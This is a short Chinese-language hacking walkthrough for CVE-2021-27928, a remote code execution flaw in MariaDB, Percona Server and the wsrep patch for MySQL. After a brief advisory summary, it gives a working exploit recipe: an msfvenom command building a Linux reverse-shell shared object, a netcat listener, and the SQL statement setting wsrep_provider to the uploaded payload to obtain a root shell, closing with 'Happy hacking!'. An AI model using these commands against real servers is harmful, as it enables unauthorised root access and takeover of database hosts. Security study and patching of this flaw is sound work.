在 MariaDB 10.2(10.2.37 之前)、10.3(10.3.28 之前)、10.4(10.4.18 之前)和 10.5(10.5.9 之前)、Percona Server(截至 2021-03-03)以及用于 MySQL 的 wsrep 补丁(截至 2021-03-03)中,发现了一个远程代码执行问题。不可信搜索路径导致 eval 注入,数据库 SUPER 用户在修改 wsrep_provider 和 wsrep_notify_cmd 后可以执行操作系统命令。注意:这不影响 Oracle 产品。
让我们使用 Msfvenom 创建我们的 payload。对于我们的 payload,我们将使用 /linux/x64/shell_reverse_tcp,将我们的 IP 作为 LHOST,端口号作为 LPORT。我们还将通过 -f 指定文件类型,在我们的案例中为 elf-so。然后使用 -o 选项将输出文件保存为 CVE-2021.27928.so。
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

我们的 payload 已就绪!让我们在指定端口上设置 netcat 监听器。
让我们将文件移动到目标机器。为此,我们可以使用任何我们喜欢的方式。我将使用 python http server。

让我们将文件保存到 /tmp 目录

现在我们需要登录数据库,并将 wsrep_provider 设置为我们上传的 payload。
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

是时候检查我们的监听器了。如果我们成功,我们应该已经获得了机器的 root shell!

黑客愉快!